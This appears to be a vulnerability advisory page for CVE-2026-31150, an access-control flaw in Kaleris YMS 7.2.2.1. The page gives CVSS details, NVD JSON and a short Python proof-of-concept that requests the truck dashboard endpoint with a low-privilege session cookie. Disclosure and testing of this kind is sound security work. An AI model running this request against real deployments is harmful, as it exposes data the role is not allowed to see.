Security Vulnerability Report
中文
CVE-2026-31150 CVSS 4.3 MEDIUM

CVE-2026-31150

Published: 2026-04-06 15:17:09
Last Modified: 2026-04-10 18:03:10

Description

Incorrect access control in Kaleris YMS v7.2.2.1 allows authenticated attackers with only the shipping/receiving role to view the truck's dashboard resources.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:kaleris:yard_management_solutions:7.2.2.1:*:*:*:*:*:*:* - VULNERABLE
Kaleris YMS v7.2.2.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target URL url = "https://target-kaleris-yms.com/api/trucks/dashboard" # Simulated session cookie for a low-privilege user (shipping/receiving role) cookies = { "JSESSIONID": "low_priv_user_session_id_here" } # Headers to mimic a browser headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" } try: # Send GET request to the restricted dashboard endpoint response = requests.get(url, headers=headers, cookies=cookies, verify=False) # Check if the request was successful and if sensitive data is returned if response.status_code == 200: print("[+] Vulnerability Exploited Successfully!") print("[+] Sensitive Dashboard Data:") print(response.text) else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-31150", "sourceIdentifier": "[email protected]", "published": "2026-04-06T15:17:09.430", "lastModified": "2026-04-10T18:03:10.237", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Incorrect access control in Kaleris YMS v7.2.2.1 allows authenticated attackers with only the shipping/receiving role to view the truck's dashboard resources."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}, {"lang": "en", "value": "CWE-639"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:kaleris:yard_management_solutions:7.2.2.1:*:*:*:*:*:*:*", "matchCriteriaId": "4981C1C6-A8B8-44C1-AB1C-132E7EE48677"}]}]}], "references": [{"url": "https://github.com/Henkel-CyberVM/CVEs/tree/main/CVE-2026-31150", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://kaleris.com/solutions/yard-management/", "source": "[email protected]", "tags": ["Product"]}]}}